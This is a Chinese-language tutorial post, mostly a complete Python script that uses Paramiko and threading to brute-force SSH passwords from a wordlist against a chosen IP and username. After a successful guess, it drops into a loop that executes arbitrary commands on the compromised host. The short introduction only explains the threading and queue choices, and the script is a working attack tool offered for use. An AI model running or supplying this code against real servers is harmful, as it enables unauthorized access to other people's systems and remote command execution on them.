利用Python第三方模块Paramiko以及多线程模块实现SSH登录密码的破解

　　注意事项：

　　　　1. 为了加速破解过程，使用多线程模块threading

　　　　2. 为了可以在线程之间传递变量（比如破解的密码），需要使用queue队列模块

　　　　3. 在成功破解后，可以继续执行命令

import paramiko
import sys
import threading
import os
import optparse
import queue


"""
    Step 1 Get argements of target IP address, username to login SSH, password path to crack
    Step 2 Class SSHProcessor
    Step 3 Define brute force method in hte SSHProcessor
    Step 4 Define command execute method in the SSHProcessr
"""


class SSHProcessor:
    def __init__(self, target, username, password_path):
        self.target = target
        self.username = username
        self.password_path = password_path
        self.q = queue.Queue()
    
    def ssh_login(self, password):
        try:
            sshclient = paramiko.SSHClient()
            sshclient.set_missing_host_key_policy(paramiko.AutoAddPolicy())
            sshclient.connect(hostname=self.target, username=self.username, password=password, timeout=2)
            print(password)
            return self.q.put(password)
        except:
            pass

    def brute_forcer(self):
        
        with open(self.password_path, 'r') as f:
            for line in f.readlines():
                password = line.strip()
                t = threading.Thread(target=self.ssh_login, args=(password,))
                t.start()
                t.join()
        # print(self.q.get())
        
        if self.q.empty():
            print("Crack Failed!")
            return None
        else:
            return self.q.get()
    
    def execute(self,password, command):
        try:
            sshclient = paramiko.SSHClient()
            sshclient.set_missing_host_key_policy(paramiko.AutoAddPolicy())
            sshclient.connect(hostname=self.target, username=self.username, password=password)
            stdin, stdout,stderror = sshclient.exec_command(command)
            print(stdout.read().decode('utf-8'))
        except Exception as e:
            print(e)
            sys.exit(0)


def get_arguments():
    parser = optparse.OptionParser('Usage: <Program> -t target IP address -u username -p passwordlist')
    parser.add_option('-t','--target', dest='target', type='string', help="Specify IP address of target")
    parser.add_option('-u', '--username', dest='username', type='string', help='Specify username to login SSH')
    parser.add_option('-p', '--password', dest='password_file', type='string', help='Specify password list file')
    options, args = parser.parse_args()
    if options.target is None or options.username is None or options.password_file is None:
        print(parser.usage)
        sys.exit(0)
    if not os.path.exists(options.password_file):
        print("The File Does Not Exit. Exiting....")
        sys.exit(0)
    return options.target, options.username, options.password_file


if __name__ == "__main__":
    target_ip, username,password_path = get_arguments()
    ssh_processor = SSHProcessor(target_ip, username, password_path)
    password = ssh_processor.brute_forcer()
    if password:
        try:
            while True:
                command = input("Enter command: ")
                if command == 'q':
                    break
                ssh_processor.execute(password, command)
        except Exception as e:
            print(e)
            sys.exit(0)